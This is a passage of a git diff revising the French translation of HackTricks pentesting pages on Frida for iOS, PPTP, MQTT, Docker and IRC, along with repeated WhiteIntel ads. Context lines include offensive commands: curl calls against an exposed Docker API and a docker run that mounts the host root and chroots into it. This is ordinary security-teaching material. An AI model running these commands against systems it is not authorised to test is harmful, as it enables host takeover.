d'Oracle](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) @@ -71,10 +71,9 @@ Les applications Android peuvent utiliser des bibliothèques natives, générale - **Débogage des bibliothèques natives :** - [Débogage des bibliothèques natives Android en utilisant JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) +### [WhiteIntel](https://whiteintel.io) -## WhiteIntel - -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. diff --git a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index 8d6044093..66fd76811 100644 --- a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -2,21 +2,21 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)! Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! -* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) -* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! +- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) +- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) +- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -40,7 +40,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur Si vous utilisez **Corellium**, vous devrez télécharger la version de Frida depuis [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[votreversion]-ios-universal.dylib.gz`) et décompressez et copiez à l'emplacement dylib demandé par Frida, par exemple : `/Users/[votreutilisateur]/.cache/frida/gadget-ios.dylib` -Une fois installé, vous pouvez utiliser sur votre PC la commande **`frida-ls-devices`** et vérifier que le périphérique apparaît (votre PC doit pouvoir y accéder).\ +Une fois installé, vous pouvez utiliser sur votre PC la commande **`frida-ls-devices`** et vérifier que l'appareil apparaît (votre PC doit pouvoir y accéder).\ Exécutez également **`frida-ps -Uia`** pour vérifier les processus en cours d'exécution sur le téléphone. ## Frida sans appareil jailbreaké et sans patcher l'application @@ -171,7 +171,7 @@ console.log("loaded"); Vous trouverez un exemple mettant en œuvre Frida Stalker dans [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py) -Voici un autre exemple pour attacher Frida Stalker chaque fois qu'une fonction est appelée: +Voici un autre exemple pour attacher Frida Stalker à chaque appel de fonction: ```javascript console.log("loading"); const wg_log_addr = Module.findExportByName("", ""); @@ -327,7 +327,7 @@ Dans ce cas, nous ne redémarrons pas l'application ou ne restaurons pas l'état De plus, Frida se connectera aux signaux d'exception d'iOS, donc lorsque Frida trouve un crash, il est probable qu'aucun rapport de crash iOS ne sera généré. -Pour éviter cela, par exemple, nous pourrions redémarrer l'application après chaque crash de Frida. +Pour prévenir cela, par exemple, nous pourrions redémarrer l'application après chaque crash de Frida. {% endhint %} ### Journaux & Crashes @@ -350,7 +350,7 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist killall -9 logd ``` -Vous pouvez vérifier les crashs dans : +Vous pouvez vérifier les crashs dans: * **iOS** * Paramètres → Confidentialité → Analyse et améliorations → Données d'analyse @@ -374,15 +374,15 @@ iOS stocke uniquement 25 crashs de la même application, donc vous devez nettoye * [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida) -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**. Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations. -Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur : +Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : {% embed url="https://whiteintel.io" %} @@ -391,7 +391,7 @@ Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! -Autres façons de soutenir HackTricks : +Autres moyens de soutenir HackTricks: * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md index 5c241d72c..becc66db5 100644 --- a/network-services-pentesting/1723-pentesting-pptp.md +++ b/network-services-pentesting/1723-pentesting-pptp.md @@ -2,7 +2,7 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)! Autres façons de soutenir HackTricks : @@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -46,14 +46,14 @@ nmap –Pn -sSV -p1723
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! Autres façons de soutenir HackTricks: * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) -* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index 31fd182a9..99f9b5af9 100644 --- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -6,17 +6,17 @@ Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! -* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) -* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! +- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) +- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) +- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -30,7 +30,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur ## Informations de base -**MQ Telemetry Transport (MQTT)** est connu comme un **protocole de messagerie publish/subscribe** qui se distingue par son extrême simplicité et sa légèreté. Ce protocole est spécifiquement conçu pour des environnements où les appareils ont des capacités limitées et fonctionnent sur des réseaux caractérisés par une faible bande passante, une latence élevée ou des connexions peu fiables. Les objectifs principaux de MQTT incluent la minimisation de l'utilisation de la bande passante réseau et la réduction de la demande sur les ressources des appareils. De plus, il vise à maintenir une communication fiable et à fournir un certain niveau d'assurance de livraison. Ces objectifs rendent MQTT exceptionnellement adapté au domaine en plein essor de la **communication machine à machine (M2M)** et de l'**Internet des objets (IoT)**, où il est essentiel de connecter efficacement une myriade d'appareils. De plus, MQTT est très bénéfique pour les applications mobiles, où la conservation de la bande passante et de la durée de vie de la batterie est cruciale. +**MQ Telemetry Transport (MQTT)** est connu comme un **protocole de messagerie publish/subscribe** qui se distingue par son extrême simplicité et sa légèreté. Ce protocole est spécifiquement conçu pour des environnements où les appareils ont des capacités limitées et fonctionnent sur des réseaux caractérisés par une bande passante faible, une latence élevée ou des connexions peu fiables. Les objectifs principaux de MQTT incluent la minimisation de l'utilisation de la bande passante réseau et la réduction de la demande sur les ressources des appareils. De plus, il vise à maintenir une communication fiable et à fournir un certain niveau d'assurance de livraison. Ces objectifs rendent MQTT exceptionnellement adapté au domaine en plein essor de la **communication machine à machine (M2M)** et de l'**Internet des objets (IoT)**, où il est essentiel de connecter efficacement une myriade d'appareils. De plus, MQTT est très bénéfique pour les applications mobiles, où la conservation de la bande passante et de la durée de vie de la batterie est cruciale. **Port par défaut :** 1883 ``` @@ -105,10 +105,10 @@ main() Le modèle de publication/abonnement est composé de : -* **Éditeur** : publie un message sur un (ou plusieurs) sujet(s) dans le courtier. -* **Abonné** : s'abonne à un (ou plusieurs) sujet(s) dans le courtier et reçoit tous les messages envoyés par l'éditeur. -* **Courtier** : route tous les messages des éditeurs vers les abonnés. -* **Sujet** : composé d'un ou plusieurs niveaux séparés par une barre oblique (par exemple, /smartshouse/livingroom/temperature). +- **Éditeur** : publie un message sur un (ou plusieurs) sujet(s) dans le courtier. +- **Abonné** : s'abonne à un (ou plusieurs) sujet(s) dans le courtier et reçoit tous les messages envoyés par l'éditeur. +- **Courtier** : route tous les messages des éditeurs vers les abonnés. +- **Sujet** : composé d'un ou plusieurs niveaux séparés par une barre oblique (par exemple, /smartshouse/livingroom/temperature). ### Format du Paquet @@ -118,33 +118,33 @@ Chaque paquet MQTT contient un en-tête fixe (Figure 02).Figure 02: En-tête Fix ### Types de Paquets -* CONNECT (1) : Initié par le client pour demander une connexion au serveur. -* CONNACK (2) : Accusé de réception du serveur d'une connexion réussie. -* PUBLISH (3) : Utilisé pour envoyer un message du client au serveur ou vice versa. -* PUBACK (4) : Accusé de réception d'un paquet PUBLISH. -* PUBREC (5) : Partie d'un protocole de livraison de message garantissant que le message est reçu. -* PUBREL (6) : Assurance supplémentaire dans la livraison de message, indiquant une libération de message. -* PUBCOMP (7) : Partie finale du protocole de livraison de message, indiquant l'achèvement. -* SUBSCRIBE (8) : Demande d'un client pour écouter les messages d'un sujet. -* SUBACK (9) : Accusé de réception du serveur d'une demande de SUBSCRIBE. -* UNSUBSCRIBE (10) : Demande d'un client d'arrêter de recevoir des messages d'un sujet. -* UNSUBACK (11) : Réponse du serveur à une demande de désabonnement. -* PINGREQ (12) : Un message de battement cardiaque envoyé par le client. -* PINGRESP (13) : Réponse du serveur au message de battement cardiaque. -* DISCONNECT (14) : Initié par le client pour terminer la connexion. -* Deux valeurs, 0 et 15, sont marquées comme réservées et leur utilisation est interdite. +- CONNECT (1) : Initié par le client pour demander une connexion au serveur. +- CONNACK (2) : Accusé de réception du serveur d'une connexion réussie. +- PUBLISH (3) : Utilisé pour envoyer un message du client au serveur ou vice versa. +- PUBACK (4) : Accusé de réception d'un paquet PUBLISH. +- PUBREC (5) : Partie d'un protocole de livraison de message garantissant que le message est reçu. +- PUBREL (6) : Assurance supplémentaire dans la livraison de message, indiquant une libération de message. +- PUBCOMP (7) : Partie finale du protocole de livraison de message, indiquant l'achèvement. +- SUBSCRIBE (8) : Demande d'un client pour écouter les messages d'un sujet. +- SUBACK (9) : Accusé de réception du serveur d'une demande de SUBSCRIBE. +- UNSUBSCRIBE (10) : Demande d'un client pour arrêter de recevoir des messages d'un sujet. +- UNSUBACK (11) : Réponse du serveur à une demande de désabonnement. +- PINGREQ (12) : Message de battement de cœur envoyé par le client. +- PINGRESP (13) : Réponse du serveur au message de battement de cœur. +- DISCONNECT (14) : Initié par le client pour terminer la connexion. +- Deux valeurs, 0 et 15, sont marquées comme réservées et leur utilisation est interdite. ## Shodan -* `port:1883 MQTT` +- `port:1883 MQTT` -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations. +Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : @@ -154,12 +154,12 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! -D'autres façons de soutenir HackTricks : +Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! -* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) -* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! +- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) +- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) +- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index b51870213..223add3f4 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -1,22 +1,22 @@ -# 2375, 2376 Test d'intrusion Docker +# 2375, 2376 Pentesting Docker
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! -Autres façons de soutenir HackTricks : +Autres façons de soutenir HackTricks: * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) +* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -38,7 +38,7 @@ Docker est la **plateforme de pointe** dans l'industrie de la **conteneurisation * [**containerd**](http://containerd.io) : Il s'agit d'un **runtime central** pour les conteneurs, chargé de la **gestion complète du cycle de vie d'un conteneur**. Cela implique la gestion du **transfert et du stockage des images**, en plus de superviser l'**exécution, la surveillance et le réseau** des conteneurs. Des **aperçus plus détaillés** sur containerd sont **explorés plus en détail**. * Le **container-shim** joue un rôle crucial en tant qu'**intermédiaire** dans la gestion des **conteneurs sans tête**, prenant en charge de manière transparente **runc** après l'initialisation des conteneurs. -* [**runc**](http://runc.io) : Estimé pour ses capacités de **runtime de conteneur léger et universel**, runc est aligné sur la **norme OCI**. Il est utilisé par containerd pour **démarrer et gérer les conteneurs** selon les **directives OCI**, ayant évolué à partir de l'**original libcontainer**. +* [**runc**](http://runc.io) : Réputé pour ses capacités de **runtime de conteneur léger et universel**, runc est aligné sur la **norme OCI**. Il est utilisé par containerd pour **démarrer et gérer les conteneurs** selon les **directives OCI**, ayant évolué à partir de l'**original libcontainer**. * [**grpc**](http://www.grpc.io) est essentiel pour **faciliter la communication** entre containerd et le **moteur Docker**, assurant une **interaction efficace**. * L'[**OCI**](https://www.opencontainers.org) est essentiel pour maintenir les **spécifications OCI** pour le runtime et les images, les dernières versions de Docker étant **conformes aux normes OCI** pour les images et le runtime. @@ -67,11 +67,11 @@ docker system prune -a ``` #### Containerd -**Containerd** a été spécifiquement développé pour répondre aux besoins des plateformes de conteneurs telles que **Docker et Kubernetes**, entre autres. Son objectif est de **simplifier l'exécution de conteneurs** sur différents systèmes d'exploitation, notamment Linux, Windows, Solaris, et autres, en abstrayant les fonctionnalités spécifiques à chaque système d'exploitation et les appels système. L'objectif de Containerd est d'inclure uniquement les fonctionnalités essentielles requises par ses utilisateurs, en s'efforçant d'omettre les composants inutiles. Cependant, il est reconnu que la réalisation complète de cet objectif est un défi. +**Containerd** a été spécifiquement développé pour répondre aux besoins des plateformes de conteneurs telles que **Docker et Kubernetes**, entre autres. Son objectif est de **simplifier l'exécution de conteneurs** sur différents systèmes d'exploitation, y compris Linux, Windows, Solaris, et autres, en abstrayant les fonctionnalités spécifiques à chaque système d'exploitation et les appels système. L'objectif de Containerd est d'inclure uniquement les fonctionnalités essentielles requises par ses utilisateurs, en s'efforçant d'omettre les composants inutiles. Cependant, il est reconnu que la réalisation de cet objectif est difficile. -Une décision de conception clé est que **Containerd ne gère pas le réseau**. Le réseau est considéré comme un élément critique dans les systèmes distribués, avec des complexités telles que le Réseau Défini par Logiciel (SDN) et la découverte de services qui varient considérablement d'une plateforme à l'autre. Par conséquent, Containerd laisse les aspects réseau être gérés par les plateformes qu'il prend en charge. +Une décision de conception clé est que **Containerd ne gère pas le réseau**. Le réseau est considéré comme un élément critique dans les systèmes distribués, avec des complexités telles que le Réseau Défini par Logiciel (SDN) et la découverte de services qui varient considérablement d'une plateforme à l'autre. Par conséquent, Containerd laisse les aspects réseau à être gérés par les plateformes qu'il prend en charge. -Alors que **Docker utilise Containerd** pour exécuter des conteneurs, il est important de noter que Containerd ne prend en charge qu'un sous-ensemble des fonctionnalités de Docker. Plus précisément, Containerd ne dispose pas des capacités de gestion du réseau présentes dans Docker et ne prend pas en charge la création de grappes Docker directement. Cette distinction met en évidence le rôle ciblé de Containerd en tant qu'environnement d'exécution de conteneurs, déléguant des fonctionnalités plus spécialisées aux plateformes avec lesquelles il s'intègre. +Alors que **Docker utilise Containerd** pour exécuter des conteneurs, il est important de noter que Containerd ne prend en charge qu'un sous-ensemble des fonctionnalités de Docker. Plus précisément, Containerd ne dispose pas des capacités de gestion réseau présentes dans Docker et ne prend pas en charge la création de grappes Docker directement. Cette distinction met en évidence le rôle ciblé de Containerd en tant qu'environnement d'exécution de conteneurs, déléguant des fonctionnalités plus spécialisées aux plateformes avec lesquelles il s'intègre. ```bash #Containerd CLI ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image @@ -89,7 +89,7 @@ ctr container delete ``` #### Podman -**Podman** est un moteur de conteneur open source qui respecte les normes de l'[Open Container Initiative (OCI)](https://github.com/opencontainers), développé et maintenu par Red Hat. Il se distingue de Docker par plusieurs fonctionnalités distinctes, notamment son architecture **sans démon** et la prise en charge des **conteneurs sans privilèges root**, permettant aux utilisateurs d'exécuter des conteneurs sans privilèges root. +**Podman** est un moteur de conteneur open source qui respecte les normes de l'[Open Container Initiative (OCI)](https://github.com/opencontainers), développé et maintenu par Red Hat. Il se distingue de Docker par plusieurs fonctionnalités distinctes, notamment son **architecture sans démon** et la prise en charge des **conteneurs sans privilèges root**, permettant aux utilisateurs d'exécuter des conteneurs sans privilèges root. Podman est conçu pour être compatible avec l'API de Docker, permettant l'utilisation des commandes CLI de Docker. Cette compatibilité s'étend à son écosystème, qui comprend des outils tels que **Buildah** pour la construction d'images de conteneurs et **Skopeo** pour les opérations sur les images telles que push, pull et inspect. Vous trouverez plus de détails sur ces outils sur leur [page GitHub](https://github.com/containers/buildah/tree/master/docs/containertools). @@ -172,7 +172,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash ``` **Curl** -Parfois, vous verrez **2376** pour le point de terminaison **TLS**. Je n'ai pas pu me connecter avec le client docker, mais il est possible de le faire avec curl. +Parfois, vous verrez **2376** disponible pour le point de terminaison **TLS**. Je n'ai pas pu me connecter avec le client docker, mais il est possible de le faire avec curl. ```bash #List containers curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq @@ -288,7 +288,7 @@ docker cp :/etc/ #### Enregistrement des activités suspectes -* Vous pouvez utiliser l'outil [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) pour détecter **des comportements suspects dans les conteneurs en cours d'exécution**. +* Vous pouvez utiliser l'outil [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) pour détecter **les comportements suspects dans les conteneurs en cours d'exécution**. * Notez dans le morceau suivant comment **Falco compile un module de noyau et l'insère**. Ensuite, il charge les règles et **commence à enregistrer les activités suspectes**. Dans ce cas, il a détecté 2 conteneurs privilégiés démarrés, dont l'un avec un montage sensible, et après quelques secondes, il a détecté l'ouverture d'un shell à l'intérieur de l'un des conteneurs. ```bash docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco @@ -340,9 +340,9 @@ Vous pouvez utiliser auditd pour surveiller Docker. * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc) -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. diff --git a/network-services-pentesting/pentesting-irc.md b/network-services-pentesting/pentesting-irc.md index 8e8e5939e..b914b2c59 100644 --- a/network-services-pentesting/pentesting-irc.md +++ b/network-services-pentesting/pentesting-irc.md @@ -2,11 +2,11 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)! Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! +* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** @@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -30,7 +30,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur ## Informations de base -IRC, initialement un protocole **en texte clair**, a été assigné **194/TCP** par l'IANA mais est généralement exécuté sur **6667/TCP** et des ports similaires pour éviter d'avoir besoin de **privilèges root** pour fonctionner. +IRC, initialement un protocole **texte brut**, a été assigné **194/TCP** par l'IANA mais est généralement exécuté sur **6667/TCP** et des ports similaires pour éviter d'avoir besoin de **privilèges root** pour fonctionner. Un **pseudo** est tout ce dont vous avez besoin pour vous connecter à un serveur. Après la connexion, le serveur effectue une recherche DNS inverse sur l'IP de l'utilisateur. @@ -52,7 +52,7 @@ openssl s_client -connect : -quiet ``` ### Manuel -Ici, vous pouvez voir comment vous connecter et accéder à l'IRC en utilisant un **pseudo aléatoire** puis énumérer des informations intéressantes. Vous pouvez en apprendre davantage sur les commandes de l'IRC [ici](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP). +Ici, vous pouvez voir comment vous connecter et accéder à l'IRC en utilisant un **pseudo aléatoire** puis énumérer quelques informations intéressantes. Vous pouvez en apprendre davantage sur les commandes de l'IRC [ici](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP). ```bash #Connection with random nickname USER 